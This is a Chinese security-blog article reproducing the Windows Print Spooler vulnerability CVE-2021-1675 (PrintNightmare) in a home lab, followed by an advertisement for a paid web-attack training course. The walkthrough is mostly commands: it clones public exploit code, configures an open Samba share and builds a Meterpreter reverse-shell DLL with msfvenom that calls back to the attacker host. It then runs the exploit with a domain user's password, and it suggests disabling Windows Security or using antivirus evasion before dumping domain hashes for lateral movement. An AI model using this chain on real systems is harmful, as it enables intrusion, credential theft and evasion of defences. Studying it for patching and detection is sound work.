微软通杀漏洞-CVE-2021-1675复现
2021-08-19 12:37:31 Author: mp.weixin.qq.com(查看原文) 阅读量:150 收藏

文章来源|MS08067安全实验室

本文作者:龙诺(Web知识星球追洞小组)

实验环境:windows2019 (192.168.189.145)

kali linux (192.168.189.146)

需要:一个普通的域账户

需要:开启 print spooler服务

使用反弹shell :需要关闭windows2019的安全中心 或者用免杀

需要:windows2019安装smb1协议(没有这个会报错)

二 搭建环境

安装impacket

我这里使用的是python虚拟环境安装搭建这样的好处是不破坏系统环境,因为python有时候安装各种模块多了容易冲突所一我们使用虚拟环境。

构造虚拟环境

virtualenv -p python3 文件夹

如果没有virtualenv的话需要你pip安装模块

构造完成以后我们使用

source 文件夹/bin/activate

进入后我们去github下载poc安装

git clone https://github.com/cube0x0/CVE-2021-1675.git git clone https://github.com/cube0x0/impacket

首先要下载poc impacket模块然后安装

因为我们使用的是虚拟环境所以我们可以直接安装安装完以后切换到poc处就可以了

source 文件夹/bin/activate python setup.py install python CVE-2021-1675.py -h

配置smb服务器

[global] workgroup = workgroup server string = test netbios name = MZ security = user map to guest = Bad User smb ports = 445 log file = /var/log/samba/log.%m max log size = 5 min protocol = SMB2

[smb] comment = Samba browseable = yes writeable = yes public = yes path = /tmp/ read only = no guest ok = yes

按照这个配置以后就可以使用impacket-smbserver 文件名、目录、开启服务器,如图

生成dll和启动msf

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.189.146 LPORT=4444 -f dll -o /tmp/rever.dll msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp exploit

利用漏洞

python CVE-2021-1675.py demonba.xxx/yuce:[email protected] '\\192.168.189.146\smb\rever.dll'

如果出错则需要安装smb1在windows2019上出错代码,下图

可以现在2019连接smb服务器出现这种报错

成功,下图

impacket-smbserver服务器也会有数据交互

同时会有反弹shell

我们可以直接查看域中账户hash 进行横向渗透

dll文件在windows

上传成功,如果开着windows安全中心会出现图

上传不成功

这里就要考虑免杀了,切记只能是普通账户

漏洞扫描

https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare


需要了解smb配置

windows2019域配置

在kali无法连接2019的时候逆向思考看看2019可以连接smb共享文件码?

https://github.com/cube0x0/CVE-2021-1675/issues/36 这里也有人问这个问题我不知道他解决了吗?

我是受下面一句话很长时间突然开悟了2019可以链接吗?

复现看着简单但是各种环境问题还有小白配置问题只有复现了才知道!

追洞小组负责人Taoing主讲

WEB高级攻防实战班 第1期  来袭

课程围绕:外围打点、边界突破、PHP审计、SRC漏洞挖掘、应急响应

课程大纲(最新)

*大纲仅作为参考,会根据当期进度有所变化(加客服获取高清课程导图)

课程目录(最新)

课程费用

每期班定价2999第一期班首发价:2499前50名送365元Web安全知识星球名额),每个报名学员都可享受一次免费的重听权益,一次没学懂就再来一遍,后续培训可任选一期来听。请有意参加培训的学员抓紧报名!支持支付宝、信用卡、花呗分期,对公转账,可开发票!

学习资源

前50名报名同学,送365元Web知识星球名额,可提前先行学习Web安全相关知识,并提供课程中需要的相关软件和环境。

上课时间

每周一、二、三、四的晚上 19:00-21:00 ,共24天,48课时,为期6周。如果无法准时参加直播课程,在线培训的每节课程都会被录制成视频上传到学员区,可随时下载观看。

上课方式

培训采用在线直播+随堂录播+微信群解答的形式,无需等待,报名后立即进入“Web星球”开始预习。

讲师介绍

Taoing:MS08067安全实验室核心成员,Web安全知识星球合伙人,安恒信息安全高级工程师,擅长企业安全研究、情报分析、渗透测试,安全开发。

TtssGkf:MS08067安全实验室核心成员,Web安全知识星球合伙人,Defcon Group 86021议题分享者,致力于漏洞分析、代码审计、漏洞挖掘。

    你距离大佬,只差一个决定       

详情咨询请联系小客服

扫描下方二维码加入星球学习

加入后邀请你进入内部微信群,内部微信群永久有效!

 

 

来和5000+位同学一起加入星球学习吧!



文章来源: http://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247495136&idx=1&sn=a86a3480ef203e680af9c5b5d55d69ae&chksm=fc3c54e1cb4bddf772f4c606ccb9efcbeb93aa9ccd546dfd226ca5d72e5fcf0c2635dc50b88e#rd
如有侵权请联系:admin#unsafe.sh